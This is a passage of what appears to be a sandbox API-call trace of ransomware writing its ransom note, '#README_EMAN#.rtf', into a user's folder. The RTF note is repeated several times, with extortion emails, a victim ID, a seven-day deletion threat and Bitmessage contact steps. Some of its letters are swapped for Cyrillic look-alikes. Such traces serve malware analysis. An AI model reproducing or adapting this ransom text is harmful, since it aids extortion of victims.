m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\";ÞÒ\x18\x06ýoÏ»Qò\x1bß°ÞbÜØ\x8f\x8cÍ|\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0298.997] WriteFile (in: hFile=0x27c, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.998] CloseHandle (hObject=0x27c) returned 1 [0298.998] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\prs-af\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\prs-af\\#readme_eman#.rtf")) returned 0xffffffff [0298.999] GetLastError () returned 0x2 [0298.999] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\prs-af\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\prs-af\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0299.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0299.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0299.001] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 